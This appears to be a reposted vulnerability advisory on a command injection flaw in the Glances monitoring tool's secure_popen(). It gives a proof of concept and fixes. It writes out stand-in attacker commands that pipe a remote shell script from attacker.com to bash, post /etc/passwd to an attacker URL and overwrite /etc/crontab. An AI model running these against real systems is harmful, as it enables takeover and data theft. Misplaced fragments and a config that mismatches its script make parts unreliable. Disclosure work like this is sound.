Listen to this Post
The `secure_popen()` function in `glances/secure.py` implements its own parser for shell‑like operators – `>` (file redirection), `|` (piping), and `&&` (command chaining) – by splitting the input string on these characters and executing each segment with subprocess.Popen(shell=False). No validation is performed on the target file path, the piped command, or the chained command.
When Application Monitoring Process (AMP) modules load their `command` or `service_cmd` configuration values from glances.conf, those values are passed directly to `secure_popen()` without any sanitization. An attacker who can modify the Glances configuration file can therefore:
– Write arbitrary content to arbitrary filesystem paths via the `>` operator (e.g., overwriting `/etc/crontab` or ~/.ssh/authorized_keys).
– Chain arbitrary commands via `&&` – e.g., echo x && curl http://attacker.com/shell.sh | bash.
– Pipe command output to arbitrary programs via |, enabling data exfiltration.
Crucially, the `–disable-config-exec` flag introduced for CVE‑2026‑33641 does not mitigate this issue. That flag only disables backtick command execution in config.get_value(); it has no effect on how `secure_popen()` interprets >, |, or &&. A command like `echo data > /etc/crontab` contains no backticks and passes through `get_value()` unchanged, then `secure_popen()` writes to the arbitrary path.
Affected code paths:
- Default AMP (
glances/amps/default/__init__.py:69): `res = self.get(‘command’)` →self.set_result(secure_popen(res).rstrip()). - SystemV AMP (
glances/amps/systemv/__init__.py:60):res = secure_popen(self.get('service_cmd')).
Both values are loaded via `GlancesAmp.load_config()` (`glances/amps/amp.py:81`).
The `secure_popen()` sink (`glances/secure.py:33‑77`) explicitly splits on:
– `>` (line 39) – the path after `>` is used directly in `open(stdout_redirect, “w”)` (line 71) with no path validation.
– `|` (line 51) – each segment is executed as a separate `Popen` with stdout piped to the next.
– `&&` (line 27) – each segment is executed sequentially.
None of these operators are sanitized or restricted when loading AMP configuration values.
DailyCVE Form:
Platform: Glances
Version: <4.5.2
Vulnerability: Command Injection
Severity: High
date: 2026-03-18
Prediction: 2026-03-14
What Undercode Say:
Analytics – The following PoC demonstrates the vulnerability in a clean environment. It loads a malicious `glances.conf` with the `–disable-config-exec` flag active (proving the flag does not help) and verifies arbitrary file write via the `>` operator.
1. Create a test configuration file cat > /tmp/poc-glances.conf << 'EOF' [bash] enable=true regex=. refresh=3 command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp [bash] cors_origins= EOF
2. Run the AMP command execution path
import sys
sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen
import os
Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)
Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')
Execute (same as amps/default/<strong>init</strong>.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')
Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content
Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')
3. Cleanup rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp
Expected output:
Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp' Result: 'POC_ARBITRARY_FILE_WRITE\n' Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n' CONFIRMED: Arbitrary file write via secure_popen > in AMP command
Negative control – The `–disable-config-exec` flag blocks backtick‑based commands (e.g., command=`rm -rf /`) but does not block `echo data > /etc/crontab` because no backticks are present.
Exploit:
An attacker with write access to `glances.conf` (via a separate file‑write bug, misconfigured shared filesystem, container volume mount, or configuration management system) can:
1. Arbitrary file write – Set `command=echo malicious > /etc/crontab` to overwrite system cron jobs.
2. Command chaining – Set `command=echo x && curl http://attacker.com/shell.sh | bash` to download and execute a remote shell.
3. Data exfiltration – Set command=cat /etc/passwd | curl -X POST --data-binary @- http://attacker.com/exfil` to send sensitive files to an attacker‑controlled server.secure_popen()
Because Glances often runs with elevated privileges (e.g., as root), these actions can lead to full system compromise.
<h2 style="color: blue;">Protection:</h2>
- Upgrade to Glances version 4.5.2 or later.
- Remove file redirection support from `secure_popen()` – eliminate the `>` operator handling (lines 39‑45 and 69‑72) or restrict output paths to a safe, non‑writable directory with path traversal protection.
- Sanitize AMP command values before passing them to. Apply the same sanitization used in `actions.py:_sanitize_mustache_dict()` to strip&&,|,>>, and `>` from AMP `command` and `service_cmd` config values./etc/crontab
- Replace `secure_popen()` with `subprocess.run(shell=False)` using explicit argument arrays – this avoids the risky operator‑parsing logic entirely.
- Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
<h2 style="color: blue;">Impact:</h2>
- Arbitrary file write – Overwrite critical system files (e.g.,,/etc/passwd,~/.ssh/authorized_keys).config.get_value()`.
- Arbitrary command execution – Run any system command with the privileges of the Glances process (often root).
- Data exfiltration – Pipe sensitive monitoring data or system files to external attackers.
- Privilege escalation – A low‑privileged user who can modify the configuration can escalate to root if Glances runs as root.
- Bypass of existing mitigation – The `--disable-config-exec` flag (CVE‑2026‑33641) does not protect against this attack, as it only blocks backtick execution in
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
